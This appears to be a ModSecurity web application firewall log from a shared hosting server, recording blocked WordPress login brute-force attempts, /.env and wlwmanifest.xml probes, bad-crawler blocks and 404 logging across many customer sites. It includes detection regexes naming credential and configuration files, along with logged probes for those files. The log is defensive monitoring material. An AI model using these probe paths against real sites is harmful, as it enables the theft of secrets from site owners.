[Tue May 26 19:44:29.859146 2026] [security2:error] [pid 77894:tid 77908] [remote 3.208.180.187:50180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWqxTomEhVPuJoD1MZevQAATA0"]
[Tue May 26 19:44:30.289193 2026] [security2:error] [pid 77894:tid 78016] [remote 178.156.182.155:52758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWqxjomEhVPuJoD1MZezQAAZHk"]
[Tue May 26 19:44:30.407711 2026] [security2:error] [pid 77894:tid 78083] [client 2406:7400:104:776f:f12f:8187:e892:cf23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWqwjomEhVPuJoD1MZeYgAAO3U"], referer: https://kingsclub.in/fitness-dance-studio/
[Tue May 26 19:44:30.540214 2026] [security2:error] [pid 77894:tid 78039] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqxjomEhVPuJoD1MZezgAAAA8"]
[Tue May 26 19:44:30.924760 2026] [security2:error] [pid 77894:tid 77911] [remote 2406:7400:104:776f:f12f:8187:e892:cf23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWqxjomEhVPuJoD1MZe3QAALRA"], referer: https://kingsclub.in/fitness-dance-studio/
[Tue May 26 19:44:32.619484 2026] [security2:error] [pid 77894:tid 78039] [client 114.119.155.228:38217] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWqyDomEhVPuJoD1MZfFQAAAA8"], referer: https://haddingtonwines.com/cart?remove_item=167434fa6219316417cd4160c0c5e7d2
[Tue May 26 19:44:32.696989 2026] [security2:error] [pid 77894:tid 78087] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqyDomEhVPuJoD1MZfBgAAAD8"]
[Tue May 26 19:44:34.264964 2026] [security2:error] [pid 77894:tid 78033] [client 176.65.139.237:57214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "m2wealthadvisor.jiyani.in"] [uri "/.env"] [unique_id "ahWqyjomEhVPuJoD1MZfOwAAAAk"]
[Tue May 26 19:44:35.125008 2026] [security2:error] [pid 77894:tid 78086] [client 192.241.240.154:49253] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWqyzomEhVPuJoD1MZfWgAAAD4"]
[Tue May 26 19:44:35.190095 2026] [security2:error] [pid 77894:tid 78104] [client 45.131.193.29:39195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 29.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wp-login.php"] [unique_id "ahWqyzomEhVPuJoD1MZfVQAAAFA"]
[Tue May 26 19:44:35.412955 2026] [security2:error] [pid 77894:tid 78093] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqyzomEhVPuJoD1MZfVAAAAEU"]
[Tue May 26 19:44:36.772612 2026] [security2:error] [pid 77894:tid 78129] [client 104.28.68.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWqzDomEhVPuJoD1MZfhQAAAGk"]
[Tue May 26 19:44:38.445115 2026] [security2:error] [pid 77894:tid 78056] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqzjomEhVPuJoD1MZfrwAAACA"]
[Tue May 26 19:44:41.065360 2026] [security2:error] [pid 77894:tid 78138] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq0DomEhVPuJoD1MZgAgAAAHI"]
[Tue May 26 19:44:42.218986 2026] [security2:error] [pid 77894:tid 78094] [client 114.119.160.248:26591] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWq0jomEhVPuJoD1MZgLAAAAEY"]
[Tue May 26 19:44:42.359002 2026] [security2:error] [pid 77894:tid 77938] [remote 2406:7400:104:776f:f12f:8187:e892:cf23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWq0jomEhVPuJoD1MZgKAAAeSs"], referer: https://kingsclub.in/fitness-dance-studio/
[Tue May 26 19:44:43.426028 2026] [security2:error] [pid 77894:tid 78121] [client 176.65.139.231:58176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wego.onesoft.in"] [uri "/.env"] [unique_id "ahWq0zomEhVPuJoD1MZgWgAAAGE"]
[Tue May 26 19:44:43.675493 2026] [security2:error] [pid 77894:tid 77939] [remote 2406:7400:104:776f:f12f:8187:e892:cf23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWq0zomEhVPuJoD1MZgWwAAPiw"], referer: https://kingsclub.in/fitness-dance-studio/
[Tue May 26 19:44:43.828939 2026] [security2:error] [pid 77894:tid 78063] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq0zomEhVPuJoD1MZgVwAAACc"]
[Tue May 26 19:44:45.485868 2026] [security2:error] [pid 77894:tid 78046] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq1TomEhVPuJoD1MZghQAAABY"]
[Tue May 26 19:44:45.818057 2026] [security2:error] [pid 77894:tid 78066] [client 176.65.139.237:47002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dnvexpress.in.onesoft.in"] [uri "/.env"] [unique_id "ahWq1TomEhVPuJoD1MZgmQAAACo"]
[Tue May 26 19:44:46.683067 2026] [security2:error] [pid 77894:tid 77969] [remote 103.27.200.76:57068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWq1jomEhVPuJoD1MZgsAAAD0o"]
[Tue May 26 19:44:47.612203 2026] [security2:error] [pid 77894:tid 77972] [remote 103.27.200.76:57068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWq1zomEhVPuJoD1MZg0AAAb00"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:44:47.745019 2026] [security2:error] [pid 77894:tid 77973] [remote 162.241.152.21:60526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq1zomEhVPuJoD1MZg0QAAHU4"]
[Tue May 26 19:44:48.005156 2026] [security2:error] [pid 77894:tid 77954] [remote 162.241.152.21:60526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq1zomEhVPuJoD1MZg4QAAfDs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:44:48.550286 2026] [security2:error] [pid 77894:tid 78029] [client 176.65.139.237:60380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rstc.onesoft.in"] [uri "/.env"] [unique_id "ahWq2DomEhVPuJoD1MZg9QAAAAU"]
[Tue May 26 19:44:48.585988 2026] [security2:error] [pid 77894:tid 78095] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq2DomEhVPuJoD1MZg5wAAAEc"]
[Tue May 26 19:44:48.603173 2026] [autoindex:error] [pid 77894:tid 78051] [client 43.157.82.252:51674] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:44:50.882858 2026] [security2:error] [pid 77894:tid 77955] [remote 163.61.60.30:54748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWq2jomEhVPuJoD1MZhKQAAFDw"]
[Tue May 26 19:44:51.594693 2026] [security2:error] [pid 77894:tid 78100] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq2zomEhVPuJoD1MZhOwAAAEw"]
[Tue May 26 19:44:54.117231 2026] [security2:error] [pid 77894:tid 78147] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq3TomEhVPuJoD1MZhlQAAAHs"]
[Tue May 26 19:44:56.806042 2026] [security2:error] [pid 77894:tid 78126] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq4DomEhVPuJoD1MZh5QAAAGY"]
[Tue May 26 19:44:58.892804 2026] [security2:error] [pid 77894:tid 78066] [client 185.191.171.14:24892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/day/2024-09-17/"] [unique_id "ahWq4jomEhVPuJoD1MZiIwAAACo"]
[Tue May 26 19:44:58.892951 2026] [security2:error] [pid 77894:tid 78066] [client 185.191.171.14:24892] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/day/2024-09-17/"] [unique_id "ahWq4jomEhVPuJoD1MZiIwAAACo"]
[Tue May 26 19:44:59.258194 2026] [security2:error] [pid 77894:tid 78145] [client 64.233.173.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWq4zomEhVPuJoD1MZiMgAAAHk"]
[Tue May 26 19:44:59.339297 2026] [security2:error] [pid 77894:tid 78055] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq4jomEhVPuJoD1MZiJgAAAB8"]
[Tue May 26 19:45:02.070406 2026] [security2:error] [pid 77894:tid 78119] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq5TomEhVPuJoD1MZieQAAAF8"]
[Tue May 26 19:45:02.124096 2026] [security2:error] [pid 77894:tid 78111] [client 212.97.176.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq5TomEhVPuJoD1MZifAAAAFc"]
[Tue May 26 19:45:02.896688 2026] [security2:error] [pid 77894:tid 77974] [remote 74.91.224.220:41994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWq5jomEhVPuJoD1MZinwAARk8"]
[Tue May 26 19:45:03.004455 2026] [security2:error] [pid 77894:tid 78066] [client 138.59.206.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWq5jomEhVPuJoD1MZipQAAACo"], referer: https://www.anujtradingco.com/
[Tue May 26 19:45:03.478293 2026] [security2:error] [pid 77894:tid 77895] [remote 74.91.224.220:41994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWq5zomEhVPuJoD1MZisgAAfgA"], referer: https://moes-art.com/wp-login.php
[Tue May 26 19:45:04.064656 2026] [security2:error] [pid 77894:tid 78097] [client 138.59.206.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWq5zomEhVPuJoD1MZiygAAAEk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467072&moderation-hash=72f44dbcdc0c737e3cf7427fd1cc1d45
[Tue May 26 19:45:04.303167 2026] [security2:error] [pid 77894:tid 78069] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq5zomEhVPuJoD1MZixAAAAC0"]
[Tue May 26 19:45:06.805265 2026] [security2:error] [pid 77894:tid 78146] [client 138.59.206.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWq6jomEhVPuJoD1MZjHgAAAHo"], referer: https://anujtradingco.com
[Tue May 26 19:45:07.142768 2026] [security2:error] [pid 77894:tid 78044] [client 109.248.143.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWq6zomEhVPuJoD1MZjNAAAABQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:45:07.166066 2026] [security2:error] [pid 77894:tid 78106] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq6jomEhVPuJoD1MZjGwAAAFI"]
[Tue May 26 19:45:07.174493 2026] [security2:error] [pid 77894:tid 77901] [remote 103.95.119.103:37512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq6jomEhVPuJoD1MZjKwAAIwY"]
[Tue May 26 19:45:08.906296 2026] [security2:error] [pid 77894:tid 78150] [client 109.248.143.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWq7DomEhVPuJoD1MZjZQAAAH4"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1231819&moderation-hash=8662a2f9dcb1b4eb1800c2469ca8aec6
[Tue May 26 19:45:09.774838 2026] [security2:error] [pid 77894:tid 77907] [remote 103.95.119.103:37512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq7TomEhVPuJoD1MZjfgAAUAw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:45:09.941243 2026] [security2:error] [pid 77894:tid 78130] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq7TomEhVPuJoD1MZjdgAAAGo"]
[Tue May 26 19:45:10.540871 2026] [security2:error] [pid 77894:tid 78016] [remote 74.7.241.58:43860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWq7jomEhVPuJoD1MZjmwAASHk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:45:12.460115 2026] [security2:error] [pid 77894:tid 78119] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq8DomEhVPuJoD1MZjygAAAF8"]
[Tue May 26 19:45:13.389604 2026] [security2:error] [pid 77894:tid 77903] [remote 113.190.40.93:60796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWq8TomEhVPuJoD1MZj7gAAdAg"]
[Tue May 26 19:45:13.467119 2026] [security2:error] [pid 77894:tid 78035] [client 114.119.151.246:32219] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "consultrgb.com"] [uri "/favicon.ico"] [unique_id "ahWq8TomEhVPuJoD1MZj-wAAAAs"], referer: https://consultrgb.com/favicon.ico
[Tue May 26 19:45:15.030017 2026] [security2:error] [pid 77894:tid 78061] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq8jomEhVPuJoD1MZkIQAAACU"]
[Tue May 26 19:45:15.297552 2026] [security2:error] [pid 77894:tid 78095] [client 109.248.143.179:38727] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWq8jomEhVPuJoD1MZkJAAAAEc"], referer: https://anujtradingco.com
[Tue May 26 19:45:17.566987 2026] [security2:error] [pid 77894:tid 78123] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq9TomEhVPuJoD1MZkmgAAAGM"]
[Tue May 26 19:45:18.973935 2026] [security2:error] [pid 77894:tid 77926] [remote 123.30.233.13:55918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWq9jomEhVPuJoD1MZkzQAAPB8"]
[Tue May 26 19:45:19.565644 2026] [security2:error] [pid 77894:tid 78127] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWq9zomEhVPuJoD1MZk2gAAAGc"]
